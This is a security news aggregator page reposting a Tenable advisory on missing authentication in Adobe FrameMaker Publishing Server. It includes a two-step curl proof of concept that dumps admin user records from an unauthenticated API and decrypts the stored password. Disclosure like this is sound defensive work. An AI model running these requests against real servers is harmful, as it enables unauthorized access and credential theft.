all InfoSec news logo
all InfoSec news - Your InfoSec news aggregator
Log in Sign up
all InfoSec news

Missing Authentication for Critical Function in Adobe FrameMaker Publishing Server (FMPS)

Add to bookmarks
Feb. 13, 2024, 6:09 p.m. | Jimi Sebree

Tenable Research Advisories www.tenable.com

Missing Authentication for Critical Function in Adobe FrameMaker Publishing Server (FMPS)

A vulnerability regarding missing authentication exists in Adobe FrameMaker Publishing Server (FMPS). This allows an unauthenticated remote attacker to access FMPS REST APIs. For example, the attacker can fetch user information (including encrypted password) for all FMPS users. The encrypted password can be decrypted by accessing a FMPS API. This allows the attacker to login to FMPS.

Proof of Concept

# curl 'http://:7000/v16/server/auth/'
[{"accessTokenExpires":"-1","userPermission":"ADMIN","userType":"ADMIN","userString":"NA","email":"fmpsuserAAA@enterprise.com","__schemaVersion":"16","_id":"6578e4aef9492a045082c7d7","username":"fmpsuserAAA","password":"6c2395917d6e121b3cb835c1ce9f69aaa1a9240cfab0cc0fe7df3e","user_denorm_string":"{\"_id\":\"6578e4aef9492a045082c7d7\",\"accessTokenExpires\":\"NA\",\"email\":\"fmpsuserAAA@enterprise.com\",\"password\":\"6c2395917d6e121b3cb835c1ce9f69aaa1a9240cfab0cc0fe7df3e\",\"userPermission\":\"ADMIN\",\"userString\":\"NA\",\"userType\":\"ADMIN\",\"username\":\"fmpsuserAAA\"}","__v":0,"accessToken":""}]

#curl -d 'password=6c2395917d6e121b3cb835c1ce9f69aaa1a9240cfab0cc0fe7df3e' 'http://:7000/v16/server/auth/decryptPassword'
"fmpsuserAAA" …

accesstoken admin adobe authentication critical email enterprise function missing password publishing server username

Visit resource

More from www.tenable.com / Tenable Research Advisories

Fluent Bit Memory Corruption Vulnerability 2 weeks, 1 day ago | www.tenable.com
corruption memory memory corruption vulnerability
Cross-Site Scripting in WordPress RSS Aggregator Plugin 2 weeks, 4 days ago | www.tenable.com
cross-site plugin rss scripting +1
Solidus Stored Cross-Site Scripting 2 weeks, 4 days ago | www.tenable.com
cross-site inject javascript malicious +8
CyberPower PowerPanel Enterprise Power Device Network Utility Multiple Vulnerabilities 3 weeks, 2 days ago | www.tenable.com
access account action admin +42
Delta Electronics DIAEnergie CEBC.exe Multiple Vulnerabilities 3 weeks, 5 days ago | www.tenable.com
cve cve-2024 cvss delta +11
Approach.App Multiple Vulnerabilities 1 month, 1 week ago | www.tenable.com
app application exploitation management +9
Karros Technologies Authentication Bypass 1 month, 1 week ago | www.tenable.com
authentication authentication bypass bypass technologies
Ivanti Avalanche WLAvalancheService.exe Unauthenticated Heap-based Buffer Overflow 1 month, 2 weeks ago | www.tenable.com
avalanche big buffer buffer overflow +12
Path Traversal Affecting Multiple CData Products 1 month, 3 weeks ago | www.tenable.com
application attachment cookie date +14

Jobs in InfoSec / Cybersecurity

Post a Job Search Talent

CyberSOC Technical Lead

@ Integrity360 | Sandyford, Dublin, Ireland
View on infosec-jobs.com

Cyber Security Strategy Consultant

@ Capco | New York City
View on infosec-jobs.com

Cyber Security Senior Consultant

@ Capco | Chicago, IL
View on infosec-jobs.com

Sr. Product Manager

@ MixMode | Remote, US
View on infosec-jobs.com

Corporate Intern - Information Security (Year Round)

@ Associated Bank | US WI Remote
View on infosec-jobs.com

Senior Offensive Security Engineer

@ CoStar Group | US-DC Washington, DC
View on infosec-jobs.com